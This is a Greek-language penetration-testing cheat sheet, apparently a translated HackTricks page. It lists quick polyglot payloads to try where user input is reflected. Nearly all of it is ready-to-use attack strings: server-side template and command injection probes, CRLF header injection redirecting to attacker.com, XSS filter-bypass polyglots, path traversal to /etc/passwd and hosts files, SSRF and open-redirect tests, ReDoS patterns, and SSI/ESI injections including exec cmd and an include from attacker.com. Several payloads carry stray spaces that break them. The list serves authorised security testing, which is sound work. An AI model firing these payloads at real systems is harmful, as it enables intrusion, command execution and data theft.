Ο στόχος αυτών των PoCs και Polygloths είναι να δώσει στον δοκιμαστή μια γρήγορη σύνοψη των ευπαθειών που μπορεί να εκμεταλλευτεί αν η είσοδός του αντικατοπτρίζεται με κάποιον τρόπο στην απόκριση .
Αυτή η λίστα δεν προτείνει μια ολοκληρωμένη λίστα δοκιμών για κάθε ευπάθεια , μόνο μερικές βασικές. Αν ψάχνετε για πιο ολοκληρωμένες δοκιμές, αποκτήστε πρόσβαση σε κάθε προτεινόμενη ευπάθεια.
Δεν θα βρείτε εξαρτώμενες από το Content-Type επιθέσεις όπως XXE , καθώς συνήθως θα προσπαθήσετε να τις δοκιμάσετε μόνοι σας αν βρείτε ένα αίτημα που στέλνει xml δεδομένα. Δεν θα βρείτε επίσης επιθέσεις βάσης δεδομένων εδώ, καθώς ακόμη και αν κάποιο περιεχόμενο μπορεί να αντικατοπτρίζεται, εξαρτάται σε μεγάλο βαθμό από την τεχνολογία και τη δομή της backend DB.
Polygloths list
Copy {{ 7 * 7 }} [ 7 * 7 ]
1 ;sleep$ { IFS } 9 ; #${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/* $(sleep 5 )`sleep 5 `` */- sleep ( 5 ) - '/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||" /* ` */
% 0d % 0aLocation : % 20http : // attacker . com
% 3f % 0d % 0aLocation : % 0d % 0aContent - Type : text / html % 0d % 0aX - XSS - Protection % 3a0 % 0d % 0a % 0d % 0a % 3Cscript % 3Ealert % 28document . domain % 29 % 3C / script % 3E
% 3f % 0D % 0ALocation : // x : 1 % 0D % 0AContent - Type : text / html % 0D % 0AX - XSS - Protection % 3a0 % 0D % 0A % 0D % 0A % 3Cscript % 3Ealert(document . domain) % 3C / script % 3E
% 0d % 0aContent - Length : % 200 % 0d % 0a % 0d % 0aHTTP / 1.1 % 20200 % 20OK % 0d % 0aContent - Type : % 20text / html % 0d % 0aContent - Length : % 2025 % 0d % 0a % 0d % 0a % 3Cscript % 3Ealert( 1 ) % 3C / script % 3E
< br >< b >< h1 > THIS IS AND INJECTED TITLE </ h1 >
/ etc / passwd
. . / . . / . . / . . / . . / . . / etc / hosts
. .\ ..\..\..\..\..\etc/hosts
/ etc / hostname
. . / . . / . . / . . / . . / . . / etc / hosts
C : / windows / system32 / drivers / etc / hosts
. . / . . / . . / . . / . . / . . / windows / system32 / drivers / etc / hosts
. .\ ..\..\..\..\..\windows/system32/drivers/etc/hosts
http : // asdasdasdasd . burpcollab . com / mal . php
\ \asdasdasdasd.burpcollab.com/mal.php
www . whitelisted . com
www . whitelisted . com . evil . com
https : // google . com
// google . com
javascript : alert ( 1 )
( \ \w*)+$
([a - zA - Z] + ) * $
((a + ) + ) + $
< !-- #echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{ 7 * 7 }} $ { 7 * 7 } <% = 7 * 7 %> $ {{ 7 * 7 }} #{7*7}${{<%[%'"}}%\
< xsl : value - of select= "system-property('xsl:version')" />< esi : include src= "" stylesheet= "" ></ esi : include >
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript : alert ()
javascript : "/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-- > '"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></ plaintext \ ></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//' ; alert (String. fromCharCode ( 88 , 83 , 83 )) // ";alert(String.fromCharCode (88,83,83))//" ; alert (String. fromCharCode ( 88 , 83 , 83 )) // -- ></ SCRIPT > ">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Dangling Markup
Οι ίδιες δοκιμές που χρησιμοποιούνται για το Open Redirect μπορούν να χρησιμοποιηθούν εδώ.
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>